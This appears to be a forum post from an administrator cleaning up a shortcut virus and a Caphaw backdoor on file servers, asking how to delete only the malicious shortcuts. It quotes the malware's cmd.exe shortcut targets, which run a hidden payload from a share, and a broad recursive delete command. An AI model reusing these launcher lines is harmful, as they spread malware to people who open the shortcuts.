The virsu hiding all of the folders and replace it with shortcut.
These are the setting in shortcuts.
C:\Windows\system32\cmd.exe /C start cmd.exe /C if exist "\\server\folder\hAoix.NCf" start "" "\\server\folder\hAoix.NCf" && start "" "\\server\folder\cs3can"
C:\Windows\system32\cmd.exe /C start cmd.exe /C if exist "\\server\folder\hAoix.NCf" start "" "\\server\folder\hAoix.NCf" && start "" "\\server\Unloads\cs3d3t"
C:\Windows\system32\cmd.exe /C start cmd.exe /C if exist "\\server\folder\hAoix.NCf" start "" "\\server\folder\hAoix.NCf" && start "" "\\server\Unloads\cs3mex\unload_from_vegas_20120501"
I just complated full scan on server and it found this
Backdoor:Win32/Caphaw.D .
Category:
Backdoor
Description:
This program provides remote access to the computer it is installed on.
Recommended action: Remove this software immediately.
Forefront Endpoint Protection detected programs that may compromise your privacy or damage your computer. You can still access the files that these programs use without removing them (not recommended). To access these files, select the Allow action and click Apply actions. If this option is not available, log on as administrator or ask the security administrator for help.
Items:
file:E:\applications\Insite\Documents\Maps\xuAaQgW.hSp
Get more information about this item online.
Update: Why this was not been picked up by the Microsoft Forefront?
I like to create a script which goes through these server and delete and shortcut which has C:\Windows\system32\cmd.exe /C start cmd.exe /C
.
If I try to go throguht manually it will take long time.
I have used this command in side a folder. del /s *.lnk
which does the job but it deletes anything which is lnk
I only like to delete shortcut which begains with C:\Windows\system32\cmd.exe /C start cmd.exe /C
.